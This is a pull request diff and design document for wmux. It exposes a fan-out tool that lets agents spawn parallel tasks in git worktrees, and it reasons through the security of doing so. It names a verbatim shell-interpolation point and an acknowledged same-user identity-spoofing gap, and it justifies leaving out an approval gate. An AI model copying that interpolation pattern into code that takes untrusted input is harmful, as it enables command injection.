### PR TITLE
feat(fanout): expose fan-out on the pipe and MCP surface

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,12 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+### Added
+
+- **Agents can now fan out.** Splitting one job into N isolated parallel tasks — each with its own git worktree on a fresh branch, its own workspace with an agent already running, and its own mission channel — required a human to open the GUI modal. It is now a tool, `fanout_start`, so an agent supervising a fleet can open one itself. A companion tool, `channel_mission_list`, lists the tasks you own so you can follow them; it reads the mission RPC that already existed. Fan-out takes far longer than one call can wait, so `fanout_start` returns as soon as it has accepted the work and you poll it by calling again with the same idempotency key.
+
+  What a caller may ask for is deliberately narrower than what the modal accepts, because the modal's fields were typed by a human and a tool call's are not. The agent command is not an input at all — it is interpolated into a shell line, so accepting one would be arbitrary command execution. Which workspace owns the tasks is resolved from the caller's verified terminal, not from anything the caller says, so no one can create tasks owned by someone else. The repository is the one the calling workspace is already in; naming any other is refused. Task count and prompt and title sizes are capped where the request arrives, not only deeper in. And like the existing background-execution path, fan-out is refused outright to anything that did not arrive over the local machine's own socket.
+
 ### Changed
 
 - **The protocol docs now state that the daemon control connection is multiplexed.** Replies and pushed events share one stream, with no subscription step, and are told apart only by whether they carry the `id` of the request you sent. Clients that wrote a request and read exactly one line back therefore worked until an event arrived at the wrong moment, then reported a failure with an empty error message and dropped the real reply — a failure mode that can invent failures but never successes, which sent two teams debugging in the wrong direction. `docs/PROTOCOL.md` §2.9 now spells out the correlation rule. No behaviour changes; correctly-written clients were never affected. (#659)

--- a/docs/api/reference.md
+++ b/docs/api/reference.md
@@ -26,7 +26,7 @@ returns `EPERM`. Wire framing: newline-delimited JSON, one object per line.
 
 ## RPC methods
 
-Total: **144** methods (`ALL_RPC_METHODS` in
+Total: **145** methods (`ALL_RPC_METHODS` in
 `src/shared/rpc.ts`). Capability and risk class are read from
 `src/main/mcp/methodCapabilityMap.ts`:
 
@@ -270,6 +270,7 @@ Total: **144** methods (`ALL_RPC_METHODS` in
 | `task.mission.close` | `a2a.channel.send` | `a2a` |
 | `task.mission.list` | `a2a.channel.read` | `a2a` |
 | `task.mission.update` | `a2a.channel.send` | `a2a` |
+| `task.fanout.start` | `a2a.channel.send` | `a2a` |
 
 ---
 

--- a/plans/fanout-mcp-surface-design.md
+++ b/plans/fanout-mcp-surface-design.md
@@ -1,0 +1,337 @@
+# Fan-out on the MCP / pipe surface — design (2026-07-28)
+
+## 0. Why
+
+`plans/as-is-to-be-2026-07-28.md` §0.3 concludes that two moats survived: **reboot
+survival** and **wmux exposing itself as MCP**. Fan-out — the marquee journey (J1)
+— is missing from the second one. `src/main/ipc/handlers/fanout.handler.ts` is a
+renderer-only `ipcMain.handle` surface; it is not registered on the pipe
+`RpcRouter`, so an MCP client cannot run a fan-out. A human has to open the GUI
+modal. This PR closes that gap.
+
+The interesting part of this change is not the plumbing — `pane.rpc.ts` already
+imports `sendToRenderer`, so there was never a technical barrier. The barrier was
+a **trust decision**: the IPC path treats every field of the request as
+renderer-authored, i.e. human-authored. The wire is not. So the wire handler is a
+*different* handler with a *narrower* input contract that happens to reuse the
+same service.
+
+## 1. Scope
+
+**In**
+
+- One new pipe RPC: `task.fanout.start` (+ `RpcMethod` union, capability map,
+  first-party allowlist, generated API reference).
+- One new MCP tool: `fanout_start`.
+- One new MCP tool for the status read: `channel_mission_list` — a thin wrapper
+  over the **existing** `task.mission.list` RPC (already registered on the pipe
+  router at `a2a.channel.rpc.ts:287`). **No new query RPC is added.**
+- `FanOutService` becomes a single shared instance injected into both the IPC
+  handler and the pipe handler.
+
+**Out (explicitly not this PR)**
+
+- Diff adoption, PR creation, task close from the wire.
+- Any change to the renderer IPC path's input contract (`agentCmd`, `repoPath`,
+  `verifiedWorkspaceId` stay caller-supplied there — they are human-typed).
+
+### 1.1 Reusing the existing query RPC (scope requirement)
+
+`task.mission.list` is already pipe-registered and already returns exactly what a
+fan-out caller needs: for the caller's workspace, every WorkTask with `taskId`,
+`title`, `status`, `missionChannelId`, and the materialised `branch` /
+`worktreePath` / `paneGroupId` fields that `FanOutService` step ④ commits. Fan-out
+tasks are born owned by the calling workspace (`§5.1 born-owned`), and
+`task.mission.list` is owner-scoped, so a caller's fan-out tasks are precisely its
+`task.mission.list` result. **No new RPC.** The only thing missing was an MCP
+*tool* over it (J0 shipped `channel_mission_start` / `channel_mission_close` but
+not `list`), so this PR adds the tool and nothing else on the server.
+
+## 2. Trust boundary
+
+### 2.1 What the two paths actually are
+
+| | renderer IPC (`fanout:start`) | pipe RPC (`task.fanout.start`) |
+|---|---|---|
+| transport | `ipcMain.handle`, Electron process boundary | named pipe / loopback TCP, `RpcRouter` |
+| who authored the fields | a human, in the GUI modal | an agent, possibly one wmux is supervising |
+| `agentCmd` | typed by the human → trusted | **never read** |
+| `repoPath` | typed by the human → trusted | must be the caller's own repo |
+| `verifiedWorkspaceId` | the renderer's active workspace → trusted | **never read**, derived server-side |
+| identity basis | Electron process boundary | `senderPtyId` → `input.findOwnerWorkspace` (D5) |
+
+The pipe handler is therefore not "the IPC handler with a router registration". It
+is a separate registrar that constructs a `FanOutRequest` from a **strict subset**
+of caller input plus server-derived values.
+
+### 2.2 Ceiling being claimed
+
+Identity here rides the same D5 anchor as `a2a.channel.*` mutations: a
+caller-supplied `senderPtyId` resolved by the renderer to the workspace that owns
+that pty *right now*. Per the honesty note in `a2a.channel.rpc.ts:34-43`, that is
+**advisory attribution under the #113 same-user ceiling**, not an unforgeable
+cross-user boundary: a same-user process can enumerate live ptyIds via
+`a2a.discover` and assert one. This PR does not claim to fix #113 and does not
+widen it — it deliberately reuses the *strongest anchor the pipe currently has*
+rather than inventing a weaker one (e.g. trusting `WMUX_WORKSPACE_ID`, or
+accepting a self-asserted `verifiedWorkspaceId`).
+
+What the anchor *does* buy, and why it matters here: a caller that cannot resolve
+a pty at all (headless script, renderer composer, LAN bridge) gets **zero**
+fan-out, fail-closed. That is the same posture channel mutations already take.
+
+## 3. The seven security requirements
+
+### R1 — `agentCmd` is never read from the wire
+
+`normalizeRequest` (IPC) reads `r['agentCmd']` and defaults to `'claude'`. On the
+wire that is arbitrary command execution: `FanOutService.buildInitialCommand`
+interpolates `agentCmd` verbatim into the shell line
+``${agentCmd} "$(cat '${path}')"`` which is then written to a PTY.
+
+The pipe handler **does not have an `agentCmd` input at all**. It sets
+`agentCmd: FANOUT_WIRE_AGENT_CMD` unconditionally, where `FANOUT_WIRE_AGENT_CMD`
+is the module constant `'claude'` (the same default the GUI pre-fills). A wire
+caller that sends `agentCmd` has it silently ignored — not rejected — because
+rejecting would leak which fields exist and would break forward compatibility for
+clients that mirror the IPC shape. The MCP tool schema does not expose the field,
+so a well-behaved caller never sends one.
+
+*Rejected alternative:* an operator-configured allowlist of agent commands. That
+is a config surface (`~/.wmux/config.json` read, validation, docs, drift) for a
+capability nobody has asked for, and the "one setting, therefore safe" shape
+invites a later PR to widen it. A hard-coded constant is a one-line diff to
+change later if a real need appears.
+
+### R2 — `verifiedWorkspaceId` is derived, never read from params
+
+`FanOutService` uses `verifiedWorkspaceId` for three things: `task.mission.start`
+ownership (born-owned), `task.mission.update` authz, and `a2a.channel.invite`
+authz. A wire caller asserting it would create tasks owned by, and mission
+channels belonging to, someone else's workspace.
+
+The pipe handler resolves it exactly as `a2a.channel.rpc.ts` does — from
+`senderPtyId` via the renderer's `input.findOwnerWorkspace` — and **deletes** any
+caller-supplied `verifiedWorkspaceId` by construction (the handler builds a fresh
+`FanOutRequest`; it never spreads `params`). An unresolvable caller is rejected.
+
+`memberId` is likewise not read from the wire (it defaults to the resolved
+workspace id inside `FanOutService`). The `'local-ui'` / `ws-human` reserved
+identities are unreachable as a consequence: they are never copied from params,
+and `ws-human` owns no panes so no `senderPtyId` can resolve into it. A defensive
+`HUMAN_WORKSPACE_ID` rejection is kept anyway, symmetric with the channel handler.
+
+### R3 — `repoPath` is confined to the caller's own repository
+
+Unconstrained `repoPath` means `git worktree add` against any repository on disk,
+plus a new `wtask/*` branch in it.
+
+The handler:
+
+1. resolves the caller's workspace (R2),
+2. asks the renderer for `workspace.list` and reads that workspace's
+   `metadata.cwd` (the same field the GUI pre-fills `repoPath` from —
+   `FanOutDialog.tsx:56`),
+3. runs `git rev-parse --show-toplevel` in that cwd → `callerRepoRoot`
+   (realpath'd),
+4. if the caller supplied `repoPath`, runs the same resolution on it and requires
+   the two roots to be **string-equal after realpath**; otherwise rejects,
+5. always passes `callerRepoRoot` (not the caller's string) to `FanOutService`.
+
+Comparing *repository roots* rather than prefix-matching paths is deliberate: a
+prefix check is defeated by symlinks and by `..`, and a subdirectory of the same
+repo is a legitimate `repoPath` that `--show-toplevel` normalises for free. The
+realpath is taken on both sides so a symlinked worktree cannot alias a different
+repo.
+
+A workspace with no `metadata.cwd`, or a cwd that is not a git repository, is
+rejected — there is no fallback to "the active workspace" (that is how a
+background agent would land on the human's foreground repo by surprise).
+
+Before either path is handed to `git`, it is validated: non-empty, no control
+characters, not starting with `-`, and `path.resolve`d. `repoPath` is passed as
+the child process **cwd**, never as an argv element, so this is belt-and-braces
+rather than the load-bearing defence.
+
+### R4 — origin allowlist, fail-closed
+
+Verbatim from the `a2a.task.send` execute precedent (`a2a.rpc.ts:437-445`):
+
+```
+local     → proceed
+remote / undefined / unknown → reject
+```
+
+`RpcContext.origin` is a required field, so a future LAN transport cannot inherit
+fan-out by forgetting to classify itself. Fan-out spawns N processes and mutates a
+git repository; it belongs in the same lane as the execute spawn that comment
+calls "blocks remote RCE".
+
+### R5 — N is capped server-side
+
+The GUI offers 1..8 (`FANOUT_MAX_TASKS`). `FanOutService.run()` already enforces
+the same cap, but the handler re-checks it *before* the service is entered, for
+three reasons: the rejection is then a wire-shaped error rather than a
+`FanOutResult`; the raw array length is bounded before any per-element work (a
+million-entry `titles` array is rejected on length, not after a million `trim()`
+calls); and the invariant is pinned by a test at the layer a reviewer reads.
+
+The handler also requires ≥1 non-empty title, and caps `taskPrompts.length` at the
+same bound.
+
+### R6 — prompt / title length caps server-side
+
+- Each task's *effective* prompt (`shared + "\n\n" + per-task`, empty side
+  dropped — the exact rule `FanOutService` applies) must be
+  ≤ `FANOUT_PROMPT_MAX_BYTES` (8 KiB), measured in UTF-8 bytes.
+- Each title must be ≤ `CHANNEL_TOPIC_MAX` (256) — the daemon's own
+  `task.mission.start` limit. Checking it here means N-1 tasks are not spawned
+  before task N is rejected by the daemon.
+
+Rejection is all-or-nothing, matching the service's existing "over cap ⇒ zero
+tasks created" contract; there is no partial spawn.
+
+### R7 — approval gate: **not added**, and why
+
+The requirement is to reuse the existing execute gate if a gate is needed, or to
+justify not adding one. This design does **not** add an approval prompt. The
+reasoning:
+
+**What fan-out actually spawns.** `buildInitialCommand` produces
+``claude "$(cat '<prompt file>')"`` written into a fresh PTY. That is an ordinary
+interactive `claude` session with its own per-tool permission prompts. It is *not*
+the `a2a` execute path, which spawns a headless worker in
+`--permission-mode bypassPermissions` (`ExecuteApprovalDialog.tsx:9-12`). The
+existing gate exists specifically because that mode has no downstream prompts.
+Fan-out's spawn does.
+
+**Marginal capability over what the caller already holds.** A first-party MCP
+caller that can reach `task.fanout.start` already holds, on the same router:
+
+- `input.send` / `input.sendKey` — type *any* command into a pane. Strictly more
+  powerful than a fixed `claude "$(cat …)"`.
+- `mcp.claimWorkspace` — create a workspace and a PTY.
+- `pane.split`, `surface.new` — create panes/surfaces.
+- `task.mission.start` — create WorkTasks and mission channels.
+
+With R1–R6 applied, the only primitive fan-out adds is `git worktree add` on the
+caller's **own** repo, ≤8 per call, into `~/.wmux/worktrees/<repoHash>/`, on a
+fresh `wtask/*` branch that must not already exist (`TaskWorktreeManager.preflight`
+fails on conflict rather than auto-suffixing). It creates no commits, rewrites no
+refs, and on failure preserves rather than deletes. Gating that while leaving
+`input.send` ungated would be incoherent security theatre.
+
+**Cost of gating it.** The wire call is asynchronous (§4), so an approval prompt
+would fire *after* the tool has returned "accepted". The existing gate auto-denies
+after 30s. An agent fleet running unattended overnight — the exact positioning in
+`as-is-to-be` §4 T1 — would silently lose every fan-out. And reusing
+`requestExecuteApproval` verbatim would fold fan-out under the user's existing
+`a2aAutoApproveExecute` toggle, silently widening a setting the user agreed to for
+a different action.
+
+**What replaces it.** Fan-out is loud, not silent: N workspaces appear in the
+sidebar, N missions appear in the Missions section, and every task has a mission
+channel with an audit trail. Accumulation is bounded by
+`WORKTASK_MAX_OPEN_PER_WORKSPACE` (256) daemon-side. Reach is bounded by the
+first-party allowlist plus the `a2a.channel.send` capability gate.
+
+**Open question left for the owner** (§7): if the owner wants a gate anyway, the
+cheap version is a one-line `if` in the pipe handler calling into a renderer
+round-trip that reuses `requestExecuteApproval` with a `kind: 'fanout'`
+discriminator on `PendingExecuteApproval` (so the dialog copy stays truthful).
+That is deliberately *not* in this PR: it touches the renderer store, the dialog,
+the approval inbox and i18n, and it should be a decision, not a side effect.
+
+## 4. Asynchrony — forced, not chosen
+
+`src/mcp/wmux-client.ts:8` sets a hard `TIMEOUT_MS = 10000` on every MCP→wmux RPC.
+A fan-out of N tasks does, per task: a daemon `task.mission.start`, a
+`git worktree add`, a renderer workspace+PTY spawn (`SPAWN_TIMEOUT_MS = 30000`), a
+`task.mission.update`, and a channel invite — serially. N=2 already blows past 10s
+on any real repository. A synchronous `task.fanout.start` would time out *by
+construction* and, worse, the client's retry would re-fire it.
+
+So the wire call is **accept-then-poll**, and the poll protocol falls out of the
+idempotency LRU that `FanOutService` already maintains:
+
+| call with key K | state | response |
+|---|---|---|
+| first | not seen | `{ ok: true, status: 'accepted', taskCount: N }`, run starts detached |
+| again, mid-flight | in-flight | `{ ok: true, status: 'running' }` |
+| again, after completion | cached | `{ ok: true, status: 'completed', result: <FanOutResult> }` |
+
+`idempotencyKey` is therefore **required** on the wire (the GUI mints one per
+submit; a wire caller must supply one it can poll with). This is the whole reason
+the LRU had to be process-lifetime shared — see §5.
+
+Two small additions to `FanOutService` serve this contract:
+
+- `statusOf(key)` — read-only view of the LRU / in-flight set.
+- `start()` no longer propagates a thrown `run()`. A throw now records a failed
+  `FanOutResult` under the key instead of releasing it. Releasing the key on a
+  throw would let a poll **restart** a fan-out that had already spawned tasks.
+  (The GUI is unaffected: it mints a fresh key per submit and surfaces
+  `{ok:false,error}` through the same toast path it already uses for service-level
+  rejections.)
+
+The detached run's rejection is caught and logged; per-task failures were already
+handled inside `run()` and surface in the recorded `FanOutResult`.
+
+## 5. One `FanOutService`, two front doors
+
+`FanOutService`'s idempotency guarantee (`§2 G1 CRITICAL`) is an **instance**
+property: the key→result LRU and the in-flight set are instance fields. Two
+instances = two LRUs = the same key accepted twice = duplicate worktrees. The IPC
+handler's comment already says the instance must live for the process lifetime.
+
+So the wiring moves up:
+
+```
+src/main/worktask/createFanOutService.ts   ← port assembly (daemon RPC + renderer spawn)
+                    │
+     main/index.ts: const fanOutService = createFanOutService(...)   // once
+                    ├──→ registerFanOutHandler(fanOutService)        // renderer IPC
+                    └──→ registerFanOutRpc(router, fanOutService, …) // pipe RPC
+```
+
+`registerFanOutHandler` loses its `getDaemonClient` / `getWindow` parameters and
+takes the service. The port-assembly code (including `SPAWN_TIMEOUT_MS`) moves
+verbatim into `createFanOutService.ts`; no behaviour changes on the IPC path.
+
+## 6. Surface registration checklist
+
+Adding an `RpcMethod` touches a fixed set of places, each guarded by a test:
+
+| file | why |
+|---|---|
+| `src/shared/rpc.ts` | `RpcMethod` union + `ALL_RPC_METHODS` (`system.capabilities`) |
+| `src/main/mcp/methodCapabilityMap.ts` | `Record<RpcMethod,…>` — a missing entry is a tsc error. `task.fanout.start` → capability `a2a.channel.send`, risk class `a2a` (same grade as `task.mission.start`, which it calls N times) |
+| `src/main/mcp/firstParty.ts` | `firstParty.test.ts` parses `src/mcp/**` for `callRpc('…')` literals and fails if a called method is not allowlisted. Adds `task.fanout.start` and `task.mission.list` |
+| `docs/api/reference.md` | regenerated via `node scripts/gen-api-reference.mjs`; `scripts/__tests__/genApiReference.test.mjs` fails on drift |
+
+Deliberately **not** touched:
+
+- `COMMANDER_RPC_METHODS` (`shared/commanderSurface.ts`) — the commander brain's
+  allow lane stays as-is. It is a supervisor, not a spawner of worktrees; least
+  privilege says a new method is out until someone needs it.
+- `COMMANDER_TEARDOWN_DENY` — fan-out has no teardown effect.
+
+## 7. Open questions
+
+1. **Approval gate** (§3 R7). Shipped without one, with the reasoning above. If
+   the owner disagrees, the reuse path is sketched and is a contained follow-up.
+2. **`memberId` on the wire.** Currently forced to the resolved workspace id. If a
+   caller ever wants a per-agent member coordinate in the mission channel roster,
+   it would need the same reserved-identity guards `a2a.channel.rpc.ts` applies.
+   Out of scope here.
+3. **`senderPtyId` vs `callerPid`.** `a2a.resolve.identity` supports a server-side
+   process-tree walk from a caller-asserted pid, for clients (Codex) that cannot
+   walk their own tree. Fan-out uses only the `senderPtyId` anchor, matching the
+   channel-mutation gate. A Codex-hosted caller with no walk hit therefore cannot
+   fan out. Fixing that means threading the walk into this handler too — a
+   separate, mechanical change, and one that should land for *all* D5 mutations at
+   once rather than for fan-out alone.
+4. **Poll ergonomics.** `status: 'accepted'` returns no task ids (they do not
+   exist yet). The caller polls `channel_mission_list`, or re-calls `fanout_start`
+   with the same key for the full `FanOutResult`. An event on the wmux event bus
+   would be nicer; it is not in scope.

--- a/src/main/index.ts
+++ b/src/main/index.ts
@@ -62,6 +62,8 @@ import { registerPluginHostHandlers } from './ipc/handlers/pluginHost.handler';
 import { registerProjectConfigHandlers } from './ipc/handlers/projectConfig.handler';
 import { registerChannelLocalHandlers } from './ipc/handlers/channelLocal.handler';
 import { registerFanOutHandler } from './ipc/handlers/fanout.handler';
+import { createFanOutService } from './worktask/createFanOutService';
+import { registerFanOutRpc } from './pipe/handlers/fanout.rpc';
 import { registerWorktaskHandlers } from './ipc/handlers/worktask.handler';
 import { registerDeckHandler } from './ipc/handlers/deck.handler';
 import { registerWorkspaceMirrorHandler } from './ipc/handlers/workspaceMirror.handler';
@@ -613,6 +615,11 @@ const browserBackendStore = new BrowserBackendStore(app.getPath('userData'));
 registerBrowserRpc(rpcRouter, () => mainWindow, webviewCdpManager, browserBackendStore);
 registerA2aRpc(rpcRouter, () => mainWindow, claudeWorker, { getDaemonClient: () => daemonClient });
 registerA2aChannelRpc(rpcRouter, () => daemonClient, () => mainWindow);
+// J1 fan-out, shared by both front doors. Constructed ONCE here (idempotency is
+// an instance property of FanOutService) and injected into the pipe RPC handler
+// below and the renderer IPC handler further down.
+const fanOutService = createFanOutService(() => daemonClient, () => mainWindow);
+registerFanOutRpc(rpcRouter, fanOutService, () => mainWindow);
 registerCompanyRpc(rpcRouter, () => mainWindow);
 registerEventsRpc(rpcRouter, () => mainWindow, (clientName) => getPluginTrustStore().get(clientName));
 registerUiPluginRpc(rpcRouter, () => mainWindow);
@@ -632,8 +639,11 @@ registerProjectConfigHandlers();
 registerChannelLocalHandlers(() => daemonClient);
 // J1 fan-out — 프롬프트 1개 → N 격리 태스크. 렌더러 다이얼로그가 fanout:start를
 // invoke하면 main의 FanOutService가 데몬 RPC + 렌더러 spawn을 조립한다(channelLocal과
-// 동일 renderer-trusted 신원, 파이프 미노출).
-registerFanOutHandler(() => daemonClient, () => mainWindow);
+// 동일 renderer-trusted 신원).
+// The SAME instance also backs the pipe/MCP surface (task.fanout.start,
+// registered above): the §2 G1 idempotency LRU is an instance field, so a
+// second instance would accept one key twice and fan out twice.
+registerFanOutHandler(fanOutService);
 // J3 태스크 수명주기 — close(remove→close 순서)·1클릭 PR(gh 4중 게이트)·정리 스캔
 // (디스크 정본)·미발사 재발사(prompt.md 읽기). 물질화 필드는 데몬 projection에서
 // 역참조하므로 렌더러는 taskId만 싣는다(단일 정본). 파이프 미노출(renderer-trusted).

--- a/src/main/ipc/handlers/fanout.handler.ts
+++ b/src/main/ipc/handlers/fanout.handler.ts
@@ -1,53 +1,21 @@
 // J1 fan-out IPC 핸들러(renderer → main). 프롬프트 1개 → N 격리 태스크.
 //
-// FanOutService(main)를 매 호출 조립한다: 데몬 RPC 포트(daemonClient) + 렌더러 spawn
-// 포트(sendToRenderer('fanout.spawnWorkspace')). 렌더러 신뢰 신원(verifiedWorkspaceId)은
-// channelLocal.handler와 동일 trust basis(Electron 프로세스 경계 — 파이프 미노출).
+// 렌더러 신뢰 신원(verifiedWorkspaceId)은 channelLocal.handler와 동일 trust basis
+// (Electron 프로세스 경계). 이 경로의 모든 필드는 사람이 GUI 모달에 입력한 값이라
+// 그대로 신뢰한다 — agentCmd·repoPath·verifiedWorkspaceId 포함.
 //
-// 멱등(§2 G1)은 FanOutService 인스턴스가 키→결과 LRU로 관리하므로, 서비스 인스턴스는
-// 프로세스 수명 동안 재사용해야 한다(핸들러 등록 시 1회 생성, 클로저로 보존).
+// The pipe/MCP front door is a DIFFERENT handler (pipe/handlers/fanout.rpc.ts)
+// with a deliberately narrower input contract: it never reads agentCmd,
+// repoPath or verifiedWorkspaceId from the caller. See
+// plans/fanout-mcp-surface-design.md §2. Both share ONE FanOutService instance
+// (injected here) because the §2 G1 idempotency LRU is an instance field.
 
-import { ipcMain, type BrowserWindow } from 'electron';
+import { ipcMain } from 'electron';
 import { IPC } from '../../../shared/constants';
 import { wrapHandler } from '../wrapHandler';
-import type { DaemonClient } from '../../DaemonClient';
-import type { RpcMethod } from '../../../shared/rpc';
-import { sendToRenderer } from '../../pipe/handlers/_bridge';
-import { FanOutService } from '../../worktask/FanOutService';
-import type { FanOutRequest } from '../../worktask/FanOutService';
+import type { FanOutRequest, FanOutService } from '../../worktask/FanOutService';
 
-type GetWindow = () => BrowserWindow | null;
-
-/** 스폰은 몇 초 걸릴 수 있으니 렌더러 spawn 타임아웃을 넉넉히(PTY 생성 포함). */
-const SPAWN_TIMEOUT_MS = 30000;
-
-export function registerFanOutHandler(
-  getDaemonClient: () => DaemonClient | null,
-  getWindow: GetWindow,
-): () => void {
-  // 프로세스 수명 단일 인스턴스 — 멱등 LRU가 재호출 사이에 유지돼야 한다.
-  const service = new FanOutService({
-    daemon: {
-      rpc: async (method: string, params: Record<string, unknown>): Promise<unknown> => {
-        const dc = getDaemonClient();
-        if (!dc) throw new Error('Daemon not connected');
-        return dc.rpc(method as RpcMethod, params);
-      },
-    },
-    renderer: {
-      spawnWorkspace: async (p) => {
-        const res = (await sendToRenderer(getWindow, 'fanout.spawnWorkspace', p, {
-          timeoutMs: SPAWN_TIMEOUT_MS,
-        })) as { workspaceId?: string; ptyId?: string; error?: string };
-        if (res && typeof res.error === 'string') return { error: res.error };
-        if (res && typeof res.workspaceId === 'string') {
-          return { workspaceId: res.workspaceId, ...(res.ptyId ? { ptyId: res.ptyId } : {}) };
-        }
-        return { error: 'fanout.spawnWorkspace: renderer returned no workspaceId' };
-      },
-    },
-  });
-
+export function registerFanOutHandler(service: FanOutService): () => void {
   ipcMain.removeHandler(IPC.FANOUT_START);
   ipcMain.handle(
     IPC.FANOUT_START,

--- a/src/main/mcp/firstParty.ts
+++ b/src/main/mcp/firstParty.ts
@@ -257,11 +257,17 @@ export const FIRST_PARTY_METHODS: ReadonlySet<RpcMethod> = new Set<RpcMethod>([
   // re-nudges, so denying it to agents would re-ping them forever.
   'a2a.channel.ack',
   'a2a.channel.unread',
-  // WorkTask mission channels (J0) — the two mutating tools the bundled server
-  // exposes (channel_mission_start / channel_mission_close). task.mission.list
-  // is pipe-only in J0 (not an MCP tool), so it is deliberately absent here.
+  // WorkTask mission channels (J0) — the mutating tools the bundled server
+  // exposes (channel_mission_start / channel_mission_close), plus the read
+  // (channel_mission_list) that is also how a fan-out caller polls the tasks it
+  // spawned.
   'task.mission.start',
   'task.mission.close',
+  'task.mission.list',
+  // Fan-out (J1) on the wire — the fanout_start tool. Every dangerous input is
+  // server-derived in the handler, so the grant is to ATTEMPT the call; an
+  // unverifiable caller still fails closed.
+  'task.fanout.start',
   // company mode (all wmux.internal — undeclarable, hence the need for this list)
   'company.a2a.whoami',
   'company.a2a.send',

--- a/src/main/mcp/methodCapabilityMap.ts
+++ b/src/main/mcp/methodCapabilityMap.ts
@@ -422,6 +422,12 @@ export const METHOD_CAPABILITY: Record<RpcMethod, RequiredCapability> = {
   // J1 §5 — 물질화 커밋. start/close와 동일 mutation 등급(a2a.channel.send).
   // 단조 물질화·배타 불변식·owner|CEO authz는 데몬 WorkTaskService에서 강제.
   'task.mission.update': { capability: 'a2a.channel.send', riskClass: 'a2a' },
+  // Fan-out spawns N missions (and their channels) in one call, so it sits at
+  // the same grade as the task.mission.start it calls N times. The capability
+  // only decides whether a plugin may REACH the surface; the origin allowlist,
+  // the server-resolved caller identity, the repo confinement and the fixed
+  // agent command are enforced in the handler (pipe/handlers/fanout.rpc.ts).
+  'task.fanout.start': { capability: 'a2a.channel.send', riskClass: 'a2a' },
 
   // --- Company subsystem (substrate-internal team/orchestration). All
   //     internal for v3.0; can be re-classified once spec covers a2a teams.

--- a/src/main/pipe/handlers/__tests__/fanout.rpc.test.ts
+++ b/src/main/pipe/handlers/__tests__/fanout.rpc.test.ts
@@ -1,0 +1,444 @@
+// ─── task.fanout.start — wire trust boundary ───────────────────────────────
+//
+// Fan-out spawns N processes and creates N git worktrees + branches, so the
+// pipe front door accepts a STRICT SUBSET of what the renderer IPC front door
+// does. Everything dangerous is server-derived. This file pins each of those
+// gates by asserting the REJECTION (or the silent override), because "the
+// happy path still works" is not what protects anyone here.
+//
+// Numbering follows plans/fanout-mcp-surface-design.md §3:
+//   R1 agentCmd is never read from the wire
+//   R2 verifiedWorkspaceId is derived from a verified ptyId, never from params
+//   R3 repoPath is confined to the caller's own repository
+//   R4 origin allowlist, fail-closed
+//   R5 task count capped server-side
+//   R6 prompt / title sizes capped server-side
+
+import * as fs from 'node:fs';
+import * as nodePath from 'node:path';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+import type { RpcContext } from '../../../../shared/rpc';
+import { FANOUT_MAX_TASKS, FANOUT_PROMPT_MAX_BYTES } from '../../../../shared/workTask';
+import { CHANNEL_TOPIC_MAX, HUMAN_WORKSPACE_ID } from '../../../../shared/channels';
+
+vi.mock('../_bridge', () => ({ sendToRenderer: vi.fn() }));
+vi.mock('../../../git/git', () => ({ git: vi.fn() }));
+
+import { sendToRenderer } from '../_bridge';
+import { git } from '../../../git/git';
+import { registerFanOutRpc, FANOUT_WIRE_AGENT_CMD } from '../fanout.rpc';
+import type { FanOutRequest, FanOutResult, FanOutService, FanOutStatus } from '../../../worktask/FanOutService';
+import type { RpcRouter } from '../../RpcRouter';
+
+const CALLER_WS = 'ws-caller';
+const CALLER_CWD = '/repo/packages/app';
+const CALLER_REPO_ROOT = '/repo';
+const FOREIGN_REPO_ROOT = '/elsewhere';
+
+type Handler = (params: Record<string, unknown>, ctx?: RpcContext) => Promise<unknown>;
+
+const LOCAL: RpcContext = { origin: 'local' };
+
+interface Harness {
+  call: (params: Record<string, unknown>, ctx?: RpcContext) => Promise<Record<string, unknown>>;
+  /** Invoke with NO second argument at all — the "handler called without a
+   *  context" case, which `call`'s default would otherwise paper over. */
+  callWithoutCtx: (params: Record<string, unknown>) => Promise<Record<string, unknown>>;
+  start: ReturnType<typeof vi.fn>;
+  statusOf: ReturnType<typeof vi.fn>;
+  /** The FanOutRequest the service was actually handed (asserts on overrides). */
+  request: () => FanOutRequest;
+}
+
+function setup(opts?: { status?: FanOutStatus; ownerWorkspaceId?: string; cwd?: string | null }): Harness {
+  const handlers = new Map<string, Handler>();
+  const router = { register: (m: string, h: Handler) => handlers.set(m, h) } as unknown as RpcRouter;
+
+  const start = vi
+    .fn<(req: FanOutRequest) => Promise<FanOutResult>>()
+    .mockResolvedValue({ ok: true, tasks: [] });
+  const statusOf = vi.fn((): FanOutStatus => opts?.status ?? { state: 'unknown' });
+  const service = { start, statusOf } as unknown as FanOutService;
+
+  const ownerWs = opts?.ownerWorkspaceId === undefined ? CALLER_WS : opts.ownerWorkspaceId;
+  const cwd = opts?.cwd === undefined ? CALLER_CWD : opts.cwd;
+
+  vi.mocked(sendToRenderer).mockImplementation(async (_win, method: string) => {
+    if (method === 'input.findOwnerWorkspace') return ownerWs ? { workspaceId: ownerWs } : {};
+    if (method === 'workspace.list') return [{ id: ownerWs, metadata: { cwd } }];
+    throw new Error(`unexpected renderer call: ${method}`);
+  });
+
+  // Every path under /repo is the caller's repo; /elsewhere is a different one.
+  vi.mocked(git).mockImplementation(async (_args: string[], dir: string) => {
+    if (dir.startsWith('/repo')) return { stdout: `${CALLER_REPO_ROOT}\n`, stderr: '', code: 0 };
+    if (dir.startsWith('/elsewhere')) return { stdout: `${FOREIGN_REPO_ROOT}\n`, stderr: '', code: 0 };
+    return { stdout: '', stderr: 'not a git repository', code: 128 };
+  });
+
+  registerFanOutRpc(router, service, () => null);
+  const handler = handlers.get('task.fanout.start');
+  if (!handler) throw new Error('task.fanout.start was not registered');
+
+  return {
+    call: async (params, ctx = LOCAL) => (await handler(params, ctx)) as Record<string, unknown>,
+    callWithoutCtx: async (params) => (await handler(params)) as Record<string, unknown>,
+    start,
+    statusOf,
+    request: () => start.mock.calls[0][0] as FanOutRequest,
+  };
+}
+
+/** Minimum viable accepted call. */
+function goodParams(overrides: Record<string, unknown> = {}): Record<string, unknown> {
+  return {
+    idempotencyKey: 'fanout-key-1',
+    senderPtyId: 'pty-1',
+    titles: ['first task', 'second task'],
+    prompt: 'do the thing',
+    ...overrides,
+  };
+}
+
+function errorOf(res: Record<string, unknown>): { code: string; message: string } {
+  expect(res.ok).toBe(false);
+  return res.error as { code: string; message: string };
+}
+
+beforeEach(() => {
+  vi.clearAllMocks();
+});
+
